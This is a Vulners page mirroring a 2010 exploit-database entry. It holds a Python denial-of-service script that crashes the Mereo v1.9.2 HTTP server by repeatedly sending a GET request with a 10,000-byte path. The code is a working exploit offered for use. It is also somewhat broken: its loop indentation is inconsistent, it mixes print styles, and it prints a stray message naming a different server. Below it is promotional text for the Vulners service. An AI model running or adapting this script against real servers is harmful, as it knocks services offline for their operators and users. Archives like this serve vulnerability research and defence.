Lucene search
K

Mereo v1.9.2 Remote HTTP Server Denial Of Service

🗓️ 30 Aug 2010 00:00:00Reported by CwG GeNiuSType 
zdt
 zdt
🔗 0day.today👁 16 Views

Mereo v1.9.2 Remote HTTP Server DoS exploit using a large payload to crash the serve

Code
=================================================
Mereo v1.9.2 Remote HTTP Server Denial Of Service
=================================================

#!/usr/bin/python
 
###########################################################################
#
# Title:    Mereo v1.9.2 Remote HTTP Server DoS (0day)
# By:       CwG GeNiuS
# Email:    cwggenius [at] gmail [dot] com
# Tested:   XPSP3
# Download: http://www.ohloh.net/p/mereo
#
############################################################################
 
 
import socket, sys
  
payload ="GET /";
payload+="X" * 10000;
payload+=" HTTP/1.1\r\n\r\n";
count = 1;
  
try:
    while (count < 100):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            print ("[*] Connecting to httpdx server.");
            s.connect((sys.argv[1], 80));
            print ("\n[*] Sending command.\n");
            s.send(payload);
            s.close();
        count = count+1;
        print count;
except:
    print "Successfully Crashed!";



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Aug 2010 00:00Current
7High risk
Vulners AI Score7
16